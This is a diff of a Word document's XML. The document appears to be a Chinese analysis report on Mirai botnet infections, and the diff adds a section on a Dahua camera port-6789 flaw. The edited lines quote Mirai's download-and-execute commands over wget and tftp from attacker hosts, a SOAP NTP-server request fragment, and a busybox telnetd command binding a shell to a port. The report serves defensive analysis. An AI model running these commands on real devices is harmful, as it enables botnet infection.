-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="480"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;NewNTPServer3&gt;&lt;/NewNTPServer3&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="480"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;NewNTPServer4&gt;&lt;/NewNTPServer4&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="480"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;NewNTPServer5&gt;&lt;/NewNTPServer5&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="480"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t>&lt;/u</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t>:SetNTPServers</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="480"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t>&lt;/SOAP-ENV</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t>:Body</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t>&gt;&lt;/SOAP-ENV:Envelope&gt;</w:t>
+        <w:t>&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6691,7 +8055,6 @@
           <w:id w:val="-806926019"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -6756,7 +8119,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[11]</w:t>
+            <w:t>[16]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -6993,7 +8356,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -7002,9 +8364,17 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>cd</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>cd /tmp;wget http://p.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="360"/>
+        <w:textAlignment w:val="baseline"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -7013,38 +8383,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /tmp;wget http://p.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:wordWrap w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
-        <w:ind w:firstLine="360"/>
-        <w:textAlignment w:val="baseline"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t>cd</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /tmp;tftp -l y.sh -r tftp.sh -g p.ocalhost.host;chmod 777 y.sh;./y.sh</w:t>
+        <w:t>cd /tmp;tftp -l y.sh -r tftp.sh -g p.ocalhost.host;chmod 777 y.sh;./y.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7090,27 +8429,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>发送上线包，数据包中的内容是</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>\x00\x00</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>\x00\x01</w:t>
+        <w:t>发送上线包，数据包中的内容是\x00\x00\x00\x01</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7171,14 +8490,315 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc472191674"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Mirai(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>6789</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>感染原理</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>目前已公开</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>的消息是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>大华摄像头</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>TCP/6789端口处存在漏洞。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>被利用后，在设备</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>上的TCP/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>19058端口开启Telnet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>监听</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:wordWrap w:val="0"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>busybox telnetd -p 19058 -l /bin/sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>文献</w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:id w:val="-1502115842"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText>CITATION Joh \l 2052</w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t>[7]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>称此</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>命令</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>是reverse shell应该是不准确的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc469905250"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc472191675"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>鉴别与防护</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7188,7 +8808,7 @@
           <w:numId w:val="10"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc469905251"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc472191676"/>
       <w:r>
         <w:t>受</w:t>
       </w:r>
@@ -7198,7 +8818,7 @@
       <w:r>
         <w:t>的症状与鉴别方式</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7230,7 +8850,6 @@
           <w:id w:val="1027376449"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -7295,7 +8914,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[6]</w:t>
+            <w:t>[8]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -7394,7 +9013,6 @@
           <w:id w:val="-745798873"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -7459,7 +9077,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[12]</w:t>
+            <w:t>[17]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -7495,7 +9113,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -7504,18 +9121,7 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
         </w:rPr>
-        <w:t>cd</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2</w:t>
+        <w:t>cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7597,7 +9203,6 @@
           <w:id w:val="-1102186593"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -7662,7 +9267,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[11]</w:t>
+            <w:t>[15]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -7769,7 +9374,6 @@
           <w:id w:val="-1867213095"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -7876,7 +9480,6 @@
           <w:id w:val="-696841360"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -7941,7 +9544,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[9]</w:t>
+            <w:t>[11]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -8019,14 +9622,14 @@
           <w:numId w:val="10"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc469905252"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc472191677"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>如何进行防护</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8103,7 +9706,6 @@
           <w:id w:val="-532797583"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -8259,7 +9861,6 @@
           <w:id w:val="-1473044083"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -8306,7 +9907,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[13]</w:t>
+            <w:t>[15]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -8488,7 +10089,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
@@ -8496,17 +10096,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>绿盟给出</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>了</w:t>
+        <w:t>绿盟给出了</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8564,7 +10154,6 @@
           <w:id w:val="723651466"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -8629,7 +10218,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[10]</w:t>
+            <w:t>[12]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -8828,7 +10417,6 @@
         </w:rPr>
         <w:t>，</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
@@ -8836,17 +10424,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>绿盟认为</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>只需</w:t>
+        <w:t>绿盟认为只需</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8904,7 +10482,6 @@
           <w:id w:val="1876966205"/>
           <w:citation/>
         </w:sdtPr>
-        <w:sdtEndPr/>
         <w:sdtContent>
           <w:r>
             <w:rPr>
@@ -8969,7 +10546,7 @@
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>[9]</w:t>
+            <w:t>[11]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -9012,12 +10589,12 @@
       <w:pPr>
         <w:pStyle w:val="1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc469905253"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc472191678"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>社区研究进展</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
